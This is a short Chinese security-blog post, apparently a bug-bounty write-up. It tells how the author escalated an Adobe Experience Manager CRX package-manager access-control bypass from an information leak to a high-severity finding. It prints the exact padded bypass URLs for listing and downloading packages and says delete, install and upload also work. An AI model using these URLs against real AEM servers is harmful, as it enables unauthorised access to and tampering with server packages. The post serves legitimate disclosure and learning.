声明：该公众号大部分文章来自团队成员日常学习笔记。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

0X01.前言

    本文介绍平时挖掘专属src的一些经验,今天主要讲讲一个通过自动化挖掘到的aem绕过漏洞由P4等级升级P2等级的经历,其实在最开始我扫出这个漏洞提交的时候被拒绝了,理由是别人已经提交,但是提交的估计是个脚本小子,扫到就直接提交了一个信息泄露,没有加以利用,白白浪费一个高危漏洞,下面我会告诉大家以后扫到这个漏洞该如何复现利用。

0X02.挖掘经历

    前不久查看VPS上的自动化扫描结果,看到一个nuclei扫出的严重漏洞,访问链接如下:

 https://xxx.xxx.xxx.com/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%%200a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?dc=1615863080856&_charset=utf-8&includeVersions=true

可以看到这个接口是泄露了很多服务器的路径,管理员上传的各种包之类的,如果直接提交这个漏洞,是可以获取100刀-300刀的奖励,但是我提交的时候是直接就重复了

本来我就打算放弃了,本着学习的心态,去网上查了下这个漏洞,发现了这是aem的crx绕过漏洞,然后我还发现了一个aem的其他接口/crx/packmgr/service.jsp,下面可以看到这里提供了很多方法,他还给了如何利用的提示,比如GET方式给了一个cmd=get,提示参数为name=&group=,这里我猜测应该就是可以下载文件的操作,然后最上面有个cmd=ls,我查看了下发现列出了所有包的group以及name,那当我们联系起来,就可以进行下载,删除,安装,上传包了。

执行ls命令演示

https://xxx.xxx.xxx.com/crx/packmgr/service.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a ;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?cmd=ls

然后利用下get,url为:

https://xxx.xxx.xxx.com/crx/packmgr/service.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?cmd=get&group=Adobe&name=org.apache.felix.http_mtf 

直接下载成功。

到这里我就说明上面的命令都是可以利用的,而且操作方式很简单,也都给了说明,这里平台的审核也是直接将该重复的漏洞加了个阻塞器

没过几天,他们复现了我的漏洞,然后更改为由客户确定了漏洞,给予了1200刀的奖励。

0X03.总结

    我们平时挖洞的时候,扫出来的漏洞还是多看一下,不要直接就交了,能提高危害就提高危害,了解下漏洞的原理,即使重复了也对自己有帮助。

原文始发于微信公众号（夜安团队SEC）：挖洞随记-记一次1200刀获取经历